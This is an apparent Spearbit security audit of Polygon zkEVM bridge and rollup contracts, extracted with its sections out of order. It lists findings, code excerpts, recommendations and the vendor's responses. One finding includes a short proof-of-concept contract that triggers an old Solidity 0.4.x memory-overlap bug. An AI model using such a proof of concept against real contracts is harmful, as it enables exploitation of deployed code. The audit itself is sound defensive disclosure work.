multiplier is 1023. /** * @notice Allow the admin to set a new multiplier batch fee * @param newMultiplierBatchFee multiplier bathc fee */ function setMultiplierBatchFee( uint16 newMultiplierBatchFee ) public onlyAdmin { require( newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024, "PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range" ); multiplierBatchFee = newMultiplierBatchFee; emit SetMultiplierBatchFee(newMultiplierBatchFee); } However, the comment mentioned that the largest allowed is 1024. // Batch fee multiplier with 3 decimals that goes from 1000 - 1024 uint16 public multiplierBatchFee; Recommendation: The implementation should be consistent with the comment and vice versa. Therefore, con- sider updating the implementation to allow the largest batch fee multiplier to be 1024 or update the comment accordingly. Polygon-Hermez: The comment is updated in PR 87. 38 Spearbit: Verified. +5.4.21 Deposit token associated Risk Awareness Severity: Informational Context: PolygonZkEVMBridge.sol#L129 Description: The deposited tokens locked in L1 could be at risk due to external conditions like the one shown below: 1. Assume there is a huge amount of token X being bridged to roll over. 2. Now mainnet will have a huge balance of token X. 3. Unfortunately due to a hack or LUNA like condition, the project owner takes a snapshot of the current token X balance for each user address and later all these addresses will be airdropped with a new token based on screenshot value. 4. In this case, token X in mainnet will be screenshot but at disbursal time the newly updated token will be airdropped to mainnet and not the user. 5. Now there is no emergencywithdraw method to get these airdropped funds out. 6. For the users, if they claim funds they still get token X which is worthless. Recommendation: Update the documentation to make users aware of such edge cases and possible actions to be taken Polygon-Hermez: This is not an scenario that affects only our zkevm, but a scenario that affects all contracts (defi, bridges, etc...). User usually notice this kind of situations, that’s why usually will move their funds back to their mainnet address. For those who don’t know about this situation, usually projects that make this kind of airdrops warns users about this conditions. Nevertheless the project could even airdrop the corresponding funds in L2, but this will always be responsibility of the project. Spearbit: Acknowledged. +5.4.22 Fees might get stuck when Aggregator is unable to verify Severity: Informational Context: PolygonZkEVM.sol#L523 Description: The collected fees from Sequencer will be stuck in the contract if Aggregator is unable to verify the batch. In this case, Aggregator will not be paid and the batch transaction fee will get stuck in the contract Recommendation: In the future if these collected fees become significant then a temporary contract upgrade may be required to allow transferring these funds. Polygon-Hermez: This is intended, the fees must be stuck in the contract until an aggregator verifies batches. In another way, if the fees could be retrieved from the contract, the aggregator reward could be stolen. Makes sense that aggregators do not receive rewards if the network is stopped. In case an aggregator is unable to verify a batch, then the whole system will be blocked. The aggregator fees might be a problem, but a very small one compared with a whole network that is stopped ( or at least the withdrawals are stopped), so technically all the bridge funds will be blocked, which is a bigger problem, and for sure we will need an upgrade if this happens In summary, the point is that we are making everything to avoid this situation, but if this happens, then anyway an upgrade must be necessary, we don’t think it’s worth putting any additional mechanism in this regard. Spearbit: Acknowledged. 39 +5.4.23 Consider using OpenZeppelin’s ECDSA library over ecrecover Severity: Informational Context: TokenWrapped.sol#L100 Description: As stated here, ecrecover is vulnerable to a signature malleability attack. While the code in permit is not vulnerable since a nonce is used in the signed data, I’d still recommend using OpenZeppelin’s ECDSA library, as it does the malleability safety check for you as well as the signer != address(0) check done on the next line. Recommendation: Replace the ecrecover call with an ECDSA.recover() call. Polygon-Hermez: We prefer to use this approach since does not perform additional checks, is more gas efficient and simpler and it’s used by very common projects like UNI. Spearbit: Acknowledged. +5.4.24 Risk of transactions not yet in Consolidated state on L2 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: There is are relatively long period for batches and thus transactions are to be between Trusted state and Consolidated state. Normally around 30 minutes but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that can’t be undone, like transactions that have an effect outside of the L2, like off ramps, OTC transactions, alternative bridges, etc). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go. Recommendation: Make sure to document the risk of transactions that are not consolidated yet on L2. Polygon-Hermez: We will add a comment regarding this in the documentation. We also want to add this informa- tion into the block explorer, similar on how optimism is doing it: optimistic.etherscan. In the field blockNumber put extra information like: confirmed by sequencer, virtual state, consolidate state. Spearbit: Acknowledged. +5.4.25 Delay of bridging from L2 to L1 Severity: Informational Context: PolygonZkEVMBridge.sol#L540-L548 Description: The bridge uses the Consolidated state while bridging from L2 to L1 and the user interface It can take between 15 min and 1 hour.". Other (opti- public.zkevm-test.net, shows "Waiting for validity proof. mistic) bridges use liquidity providers who take the risk and allow users to retrieve funds in a shorter amount of time (for a fee). Recommendation: Consider implementing a mechanism to reduce the time to bridge from L2 to L1. Polygon-Hermez: We do not plan to implement the such mechanism. We consider that the 15min-1hour is an acceptable delay since it’s a typical timing is most CEX, so users are already used to this timing for being able to withdraw funds. In case it becomes a must for the users, we expect that other projects can deploy on top of our system and provide such solutions with some incentives mechanism using the messages between layers. Spearbit: Acknowledged. 40 +5.4.26 Missing Natspec documentation Severity: Informational Context: PolygonZkEVM.sol#L672, PolygonZkEVM.sol#L98 Description: Some NatSpec comments are either missing or are incomplete. • Missing NatSpec comment for pendingStateNum: /** * @notice Verify batches internal function * @param initNumBatch Batch which the aggregator starts the verification * @param finalNewBatch Last batch aggregator intends to verify * @param newLocalExitRoot * @param newStateRoot New State root once the batch is processed * @param proofA zk-snark input * @param proofB zk-snark input * @param proofC zk-snark input */ function _verifyBatches( New local exit root once the batch is processed uint64 pendingStateNum, uint64 initNumBatch, uint64 finalNewBatch, bytes32 newLocalExitRoot, bytes32 newStateRoot, uint256[2] calldata proofA, uint256[2][2] calldata proofB, uint256[2] calldata proofC ) internal { • Missing NatSpec comment for pendingStateTimeout: /** * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed ,→ * and avoid stack too deep errors. * @param admin Admin address * @param chainID L2 chainID * @param trustedSequencer Trusted sequencer address * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param trustedAggregator Trusted aggregator * @param trustedAggregatorTimeout Trusted aggregator timeout */ struct InitializePackedParameters { address admin; uint64 chainID; address trustedSequencer; uint64 pendingStateTimeout; bool forceBatchAllowed; address trustedAggregator; uint64 trustedAggregatorTimeout; } Recommendation: Add or complete missing NatSpec comments. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 41 +5.4.27 _minDelay could be 0 without emergency Severity: Informational Context: PolygonZkEVMTimelock.sol#L40-L46 Description: Normally min delay is only supposed to be 0 when in an emergency state. But this could be made to 0 even in nonemergency mode as shown below: 1. Proposer can propose an operation for changing _minDelay to 0 via updateDelay function. 2. Now, if this operation is executed by the executor then _minDelay will be 0 even without an emergency state. **Recommendation:**Override updateDelay function and impose a minimum timelock delay preventing 0 delay OR Update docs to make users aware of such scenario(s) so that they can take a decision if such a proposal ever arrives Polygon-Hermez: Being able to update the delay to 0 is the standard in most Timelock implementations, including the one followed by Openzepplin, we don’t see a reason to change its default behavior. Since this is the default behavior, users are already aware of this scenario. Spearbit: Acknowledged. +5.4.28 Incorrect/incomplete comment Severity: Informational Context: Mentioned in Recommendation Description: There are a few mistakes in the comments that can be corrected in the codebase. Recommendation: • PolygonZkEVM.sol#L1106: This function is used for configuring the pending state timeout. - * @notice Allow the admin to set a new trusted aggregator timeout + * @notice Allow the admin to set a new pending state timeout • PolygonZkEVMBridge.sol#L217: Function also sends ETH, would be good to add that to the NatSpec. - * @notice Bridge message + * @notice Bridge message and send ETH value • PolygonZkEVMBridge.sol#L69: A developer assumption is not documented. + * @notice The value of `_polygonZkEVMaddress` on the L2 deployment of the contract will be `address(0)`, so ,→ + * emergency state is not possible for the L2 deployment of the bridge, intentionally • PolygonZkEVM.sol#L141: The comment is not synchronized with the ForcedBatchData struct. It should be minForcedTimestamp instead of minTimestamp for the last parameter. // hashedForcedBatchData: hash containing the necessary information to force a batch: - // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minTimestamp) + // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minForcedTimestamp) • PolygonZkEVM.sol#L522: Comment is incorrect, the sequencer actually pays collateral for every non-forced batch submitted, not for every batch submitted - // Pay collateral for every batch submitted + // Pay collateral for every non-forced batch submitted • PolygonZkEVM.sol#L864: Comment is incorrect, the actual variable updated is currentBatch not current- LastVerifiedBatch 42 - // update currentLastVerifiedBatch + // update currentBatch • PolygonZkEVM.sol#L1193: Comment seems to be copy-pasted from another method proveNonDetermin- isticPendingState, remove it or write a comment for the current function - * @notice Allows to halt the PolygonZkEVM if its possible to prove a different state root given the same batches ,→ Polygon-Hermez: Solved in PR 87. Spearbit: Verified. +5.4.29 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Some functions could also be renamed to better reflect their purposes. Recommendation: • PolygonZkEVM.sol#L671: The function _verifyBatches() does more than verifying batches. It also trans- fers matic. Therefore, it is recommended to change the function name and comment. - function _verifyBatches( + function _verifyAndRewardBatches( uint64 pendingStateNum, uint64 initNumBatch, • PolygonZkEVMBridge.sol#L37: Typo. Should be identifier instead of indentifier - // Mainnet indentifier + // Mainnet identifier • TokenWrapped.sol#L53: Typo. Should be immutable instead of inmutable - + // initialize inmutable variables // initialize immutable variables • PolygonZkEVM.sol#L407, PolygonZkEVM.sol#L970: Typo and grammatical error. Should be batches to instead of batces ot and should be Struct array which holds the necessary data instead of Struct array which the necessary data - * @param batches Struct array which the necessary data to append new batces ot the sequence + * @param batches Struct array which holds the necessary data to append new batches to the sequence ,→ • PolygonZkEVM.sol#L1502: Typo. Should be the instead of teh - * @param initNumBatch Batch which the aggregator starts teh verification + * @param initNumBatch Batch which the aggregator starts the verification • PolygonZkEVM.sol#L1396: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contracts 43 • PolygonZkEVM.sol#L1430: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts • PolygonZkEVM.sol#L144: Typo. Should be contracts instead of contrats - ,→ + ,→ * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts • PolygonZkEVM.sol#L1108: Typo. Should be aggregator instead of aggreagator - + * @param newTrustedAggregatorTimeout Trusted aggreagator timeout * @param newTrustedAggregatorTimeout Trusted aggregator timeout • PolygonZkEVM.sol#L969: Grammatical error. Should be has not done so in the timeout period in- stead of do not have done it in the timeout period - * @notice Allows anyone to sequence forced Batches if the trusted sequencer do not have done it in the timeout period * @notice Allows anyone to sequence forced Batches if the trusted sequencer has not done so in the timeout period ,→ + ,→ • PolygonZkEVM.sol#L1291: Typo. Should be function instead of functoin - ,→ + ,→ * @notice Internal functoin that prove a different state root given the same batches to verify * @notice Internal function that prove a different state root given the same batches to verify • PolygonZkEVM.sol#L1062: Typo. Should be sequencer instead of sequuencer - + * @param newTrustedSequencer Address of the new trusted sequuencer * @param newTrustedSequencer Address of the new trusted sequencer • PolygonZkEVM.sol#L1094: Legacy comment. Does not make sense with current code - * If address 0 is set, everyone is free to aggregate • PolygonZkEVM.sol#L1131: Typo. Should be aggregator instead of aggreagator - + * @param newPendingStateTimeout Trusted aggreagator timeout * @param newPendingStateTimeout Trusted aggregator timeout • PolygonZkEVM.sol#L1153: Typo. Should be batch instead of bathc - + * @param newMultiplierBatchFee multiplier bathc fee * @param newMultiplierBatchFee multiplier batch fee • PolygonZkEVM.sol#L1367: Grammatical error. Should be must be equal to instead of must be equal than - ,→ + ,→ "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal than currentLastVerifiedBatch" "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal to currentLastVerifiedBatch" • PolygonZkEVM.sol#L332: Typo. Should be deep instead of depp 44 - + * @param initializePackedParameters Struct to save gas and avoid stack too depp errors * @param initializePackedParameters Struct to save gas and avoid stack too deep errors • PolygonZkEVM.sol#L85: Typo. Should be because instead of becasue - * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed ,→ + * @notice Struct to call initialize, this basically saves gas because pack the parameters that can be packed ,→ • PolygonZkEVM.sol#L59: Typo. Should be calculate instead of calcualte - * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calcualte the fees ,→ + * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calculate the fees ,→ • PolygonZkEVM.sol#L276: Typo. Should be sequencer instead of seequencer - * @dev Emitted when the admin update the seequencer URL + * @dev Emitted when the admin update the sequencer URL • PolygonZkEVM.sol#L459: Grammatical error. Should be Check global exit root exists with proper batch length. These checks are already done in the forceBatches call. instead of Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call - // Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call // Check global exit root exists with proper batch length. These checks are already done in the forceBatches call. ,→ + ,→ • PolygonZkEVM.sol#L123, PolygonZkEVM.sol#L755: Typo. Should be tries instead of trys - // This should be a protection against someone that trys to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires // This should be a protection against someone that tries to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires ,→ + ,→ - + * It trys to consolidate the first and the middle pending state * It tries to consolidate the first and the middle pending state • PolygonZkEVM.sol#L55: Grammatical error. Should be Struct which will be stored instead of Struct which will stored - + * @notice Struct which will stored for every batch sequence * @notice Struct which will be stored for every batch sequence • PolygonZkEVM.sol#L71: Grammatical error. should be will be turned off instead of will be turn off and should be in the future instead of in a future - + * This is a protection mechanism against soundness attacks, that will be turn off in a future * This is a protection mechanism against soundness attacks, that will be turned off in the future ,→ • PolygonZkEVM.sol#L90: Typo. Should be whether instead of wheather - + * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param forceBatchAllowed Indicates whether the force batch functionality is available 45 Polygon-Hermez: Solved in PR 87. Spearbit: Verified. +5.4.30 Enforce parameters limits in initialize() of PolygonZkEVM Severity: Informational Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVM.sol#L1110-L1149 Description: The function initialize() of PolygonZkEVM doesn’t enforce limits on trustedAggregatorTime- out and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPend- ingStateTimeout(). As the project has indicated it might be useful to set larger values in initialize(). function initialize(..., InitializePackedParameters calldata initializePackedParameters,...) ... { trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout; ... pendingStateTimeout = initializePackedParameters.pendingStateTimeout; ... } function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin { require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT,....); ... trustedAggregatorTimeout = newTrustedAggregatorTimeout; ... } function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin { require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ... ); ... pendingStateTimeout = newPendingStateTimeout; ... } Recommendation: Consider enforcing the same limits in initialize() as in the update functions, this will make the code easier to reason about. If different limits are allowed on purpose then add some comments. Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 46 6 Appendix 6.1 Introduction On March 20th of 2023, Spearbit conducted a deployment review for Polygon zkEVM. The target of the review was zkevm-contracts on commit cddde2. Disclaimer : This security review does not guarantee against a hack. It is a snapshot in time of the deployment review for Polygon zkEVM according to the specific commit. Any modifications to the code will require a new security review. 6.2 Changes after first review Several changes have been made after the first Spearbit review conducted on January 2023 (found in the main body of this document), which include: • A change in the verifier to FflonkVerifier; • A way to delay setting the global exit root as well as updateGlobalExitRoot() in PolygonZkEVMBridge; • setForceBatchTimeout() and activateForceBatches() inPolygonZkEVM to switch on the ForceBatches mechanism on a later moment; • Several fixes and optimizations. 6.3 Results No security issues have been found in the above mentioned changes. +6.3.1 Mainnet deployment The following deployment addresses on ethereum Mainnet where checked: • PolygonZkEVM proxy • PolygonZkEVM implementation • FflonkVerifier • PolygonZkEVMBridge proxy • PolygonZkEVMBridge implementation • PolygonZkEVMGlobalExitRoot proxy • PolygonZkEVMGlobalExitRoot implementation • PolygonZkEVMDeployer • PolygonZkEVMTimelock • ProxyAdmin +6.3.3 L2 deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +6.3.4 Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 2 1 About Spearbit Spearbit is a decentralized network of expert security engineers offering reviews and other security related services to Web3 projects with the goal of creating a stronger ecosystem. Our network has experience on every part of the blockchain technology stack, including but not limited to protocol design, smart contracts and the Solidity compiler. Spearbit brings in untapped security talent by enabling expert freelance auditors seeking flexibility to work on interesting projects together. Learn more about us at spearbit.com 2 Introduction Smart contract implementation which will be used by the Polygon-Hermez zkEVM. Disclaimer : This security review does not guarantee against a hack. It is a snapshot in time of zkEVM-Contracts according to the specific commit. Any modifications to the code will require a new security review. 3 Risk classification Severity level Likelihood: high Likelihood: medium High Likelihood: low Medium Impact: High Impact: Medium Impact: Low Critical High Medium Low Medium Low Low 3.1 Impact • High - leads to a loss of a significant portion (>10%) of assets in the protocol, or significant harm to a majority of users. • Medium - global losses <10% or losses to only a subset of users, but still unacceptable. • Low - losses will be annoying but bearable--applies to things like griefing attacks that can be easily repaired or even gas inefficiencies. 3.2 Likelihood • High - almost certain to happen, easy to perform, or not easy but highly incentivized • Medium - only conditionally possible or incentivized, but still relatively likely • Low - requires stars to align, or little-to-no incentive 3.3 Action required for severity levels • Critical - Must fix as soon as possible (if already deployed) • High - Must fix (before deployment if not already deployed) • Medium - Should fix • Low - Could fix 4 Executive Summary Over the course of 13 days in total, Polygon engaged with Spearbit to review the zkevm-contracts protocol. In this period of time a total of 68 issues were found. 3 Summary Project Name Polygon Repository Commit zkevm-contracts 5de59e...f899 Type of Project Cross Chain, Bridge Audit Timeline Jan 9 - Jan 25 Two week fix period Jan 25 - Feb 8 Severity Critical Risk High Risk Medium Risk Low Risk Gas Optimizations Informational Total Issues Found Count Fixed Acknowledged 0 0 3 16 19 30 68 0 0 3 10 18 19 50 0 0 0 6 1 11 18 4 5 Findings 5.1 Medium Risk 5.1.1 Funds can be sent to a non existing destination Severity: Medium Risk Context: PolygonZkEVMBridge.sol#L129-L257 Description: The function bridgeAsset() and bridgeMessage() do check that the destination network is different If accidentally the wrong than the current network. However, they don’t check if the destination network exists. networkId is given as a parameter, then the function is sent to a nonexisting network. If the network would be deployed in the future the funds would be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... } Recommendation: Check the destination networkID is a valid destination. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.1.2 Fee on transfer tokens Severity: Medium Risk Context: PolygonZkEVMBridge.sol#L171 Description: The bridge contract will not work properly with a fee on transfer tokens 1. User A bridges a fee on transfer Token A from Mainnet to Rollover R1 for amount X. 2. In that case X-fees will be received by bridge contract on Mainnet but the deposit receipt of the full amount X will be stored in Merkle. 3. The amount is claimed in R1 and a new TokenPair for Token A is generated and the full amount X is minted to User A 4. Now the full amount is bridged back again to Mainnet 5. When a claim is made on Mainnet then the contract tries to transfer amount X but since it received the amount X-fees it will use the amount from other users, which eventually causes DOS for other users using the same token Recommendation: Use the exact amount which is transferred to the contract which can be obtained using below sample code 5 uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(address(this)); IERC20Upgradeable(token).safeTransferFrom(address(msg.sender), address(this), amount); uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(address(this)); uint256 transferedAmount = balanceAfter - balanceBefore; // if you dont want to support fee on transfer token use below: require (transferedAmount == amount, ...); // use transferedAmount if you want to support fee on transfer token Polygon-Hermez: Solved in PR 87. To protect against reentrancy with erc777 tokens, a check for reentrancy MUST be added. Solved in PR 91. Spearbit: Verified. 5.1.3 Function consolidatePendingState() can be executed during emergency state Severity: Medium Risk Context: PolygonZkEVM.sol#L783-L793 Description: The function consolidatePendingState() can be executed by everyone even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state. function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); } Recommendation: Consider adding the following, which also improves consistency function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(!isEmergencyState,...); require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); + } Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 6 5.2 Low Risk 5.2.1 Sequencers can re-order forced and non-forced batches Severity: Low Risk Context: PolygonZkEVM.sol#L409-L533 Description: Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches; non-forced (NF) and forced (F). A sequencer can order the following sets of batches (F1, F2) and (NF1, NF2) in any order so as long as the order of the forced batch and non-forced batch sets are kept in order. i.e. A sequencer can sequence batches as F1 -> NF1 -> NF2 -> F2 but they can also equivalently sequence these same batches as NF1 -> F1 -> F2 -> NF2. Recommendation: Ensure this behavior is understood and consider what impact decentralizing the sequencer role would have on bridge users. Polygon-Hermez: Added comments to function forceBatch() in PR 85. Spearbit: Acknowledged. 5.2.2 Check length of smtProof Severity: Low Risk Context: DepositContract.sol#L90-L112 Description: An obscure Solidity bug could be triggered via a call in solidity 0.4.x. Current solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This situation happens to be the case as verifyMerkleProof() (and all the functions that call it) don’t check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions, that doesn’t seem to be the case. Here is a POC of the issue which can be run in remix // SPDX-License-Identifier: MIT // based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol ,→ pragma solidity ^0.4.24; // only works with low solidity version import "hardhat/console.sol"; contract test{ struct Overlap { uint field0; } function mint(uint[] memory amounts) public { Overlap memory v; console.log("before: ",amounts[0]); v.field0 = 567; console.log("after: ",amounts[0]); // would expect to be 0 however is 567 } function go() public { // this part requires the low solidity version bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251); bool success = address(this).call(payload); console.log(success); } } Recommendation: Although it currently isn’t exploitable, to be sure consider adding a check on the length of smtProof; 7 function verifyMerkleProof..., bytes32[] memory smtProof, ...) public pure returns (bool) { + require (smtProof.length == _DEPOSIT_CONTRACT_TREE_DEPTH); ... } Or use a fixed-size array. function verifyMerkleProof(..., bytes32[_DEPOSIT_CONTRACT_TREE_DEPTH] memory smtProof,... ) ... { } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. 5.2.3 Transaction delay due to free claimAsset() transactions Severity: Low Risk Context: batchbuilder.go#L29-L122 Description: The sequencer first processes the free claimAsset() transaction and then the rest. This might delay other transactions if there are many free claimAsset() transactions. As these transactions would have to be initiated on the mainnet, the gas costs there will reduce this problem. However, once multiple rollups are supported in the future the transactions could originate from another rollup with low gas costs. func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) { ... appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // `claimAsset()` transactions ,→ appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount ,→ ... } Recommendation: Consider adding a limited amount of free claimAsset() transactions to a batch. Polygon-Hermez: This is important to consider once multiple rollups are implemented. For now, we’ll let it be like this. Spearbit: Acknowledged. 5.2.4 Misleading token addresses Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L373 Description: The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specific originTokenAddresses, it’s possible to create vanity addresses on the other chain. These addresses could be similar to legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge) function claimAsset(...) ... { ... bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } 8 Recommendation: Have a way for users to determine legitimate bridged tokens, for example via tokenlists. Polygon-Hermez: Our front end will show a list of supported tokens, and the users will be able also to import custom tokens too ( the same way it happens in a lot of DEXs). But we cannot control of course the use of all the dapps deployed. Dapps that integrate with our system should be able to import our token list or calculate them. There are view functions to help calculate an L2 address pre- calculatedWrapperAddress given a mainnet token address and metadata. Also easily a user/dapp can check the corresponding L1 token address of every token of L2 calling wrappedTokenToTokenInfo and checking originTo- kenAddress is in their Mainnet token list for example. Our front end will show a list of supported tokens, the users will be able also to import custom tokens too ( the same way it happens in a lot of DEXs). But we cannot control of course the use of all the dapps deployed. Dapps that integrate with our system should be able to import our token list or calculate them. There’s view functions to help calculate a L2 address precalculatedWrapperAddress given a mainnet token address and metadata. Also easily a user/dapp can check the corresponding L1 token address of every token of L2 calling wrappedTokenToTokenInfo and checking originTokenAddress is in their Mainnet token list for example. Spearbit: Acknowledged. 5.2.5 Limit amount of gas for free claimAsset() transactions Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L436 Description: Function claimAsset() is subsidized (e.g. gasprice is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1. Note: this is implemented in the Go code, which detects transactions to the bridge with function bridgeClaimMethodSignature == "0x7b6323c1", which is the selector of claimAsset(). See function IsClaimTx() in transaction.go. function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... } Recommendation: Limit the amount of gas supplied to claimAsset() while doing free transactions. Note: A PR is being made to limit the available gas: PR 1551. Polygon-Hermez: We will take this into consideration in the current and future implementation of the sequencer. Spearbit: Acknowledged. 5.2.6 What to do with funds that can’t be delivered Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L436 Description: Both claimAsset() and claimMessage() might revert on different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action. So they are essentially lost for the originator and recipient. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations: 9 function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); require(success, ... ); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } Recommendation: Consider having a recovery mechanism for funds that can’t be delivered. For example, the funds could be delivered to an EOA recovery address on a destination chain. This requires adding more info in the merkle root and also needs to check those senders add a recovery address, otherwise, there isn’t always a recovery address. It could be implemented via a function (e.g. recoverAsset()) where the recovery address initiates a transaction (similar to claimAsset() ) and the funds are delivered to the recovery address. Polygon-Hermez: We decided that such a mechanism is not worth implementing since the user can also put an invalid recoverAddress and it adds too much overhead. If the user put an invalid address as a destination address, either if it was mistaken or puts a smart contract that cannot receive funds, the funds will be lost. Spearbit: Acknowledged. 5.2.7 Inheritance structure does not openly support contract upgrades Severity: Low Risk Context: PolygonZkEVMBridge.sol#L18-L21 Description: The solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed as left to right of all child contracts before considering the parent contract. Storage slot assignment PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> The Initializable.sol already reserves storage slots for future upgrades and because PolygonZkEVM- Bridge.sol is inherited last, storage slots can be safely appended. However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades. Recommendation: Consider introducing a storage gap to the two intermediate contracts. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 10 5.2.8 Function calculateRewardPerBatch() could divide by 0 Severity: Low Risk Context: PolygonZkEVM.sol#L1488-L1498 Description: The function calculateRewardPerBatch() does a division by totalBatchesToVerify. If there are currently no batches to verify, then totalBatchesToVerify would be 0 and the transaction would revert. When calculateRewardPerBatch() is called from _verifyBatches() this doesn’t happen as it will revert earlier. However when the function is called externally this situation could occur. function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); return currentBalance / totalBatchesToVerify; ,→ } Recommendation: Consider changing the code to something like function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); ,→ if (totalBatchesToVerify == 0) return 0; return currentBalance / totalBatchesToVerify; + } Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 5.2.9 Limit gas usage of _updateBatchFee() Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: The function _updateBatchFee() loops through all unverified batches. Normally this would be 30 min/5 min ~ 6 batches. Assume the aggregator malfunctions and after one week, verifyBatches() is called, which calls _updateBatch- Fee(). Then there could be 7 * 24 * 60 min/ 5 min ~ 2352 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might result in an out-of-gas error. This would possibly require multiple verifyBatches() tries with a smaller number of batches, which would increase network outage. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if (block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget) { ... } ... } ... } 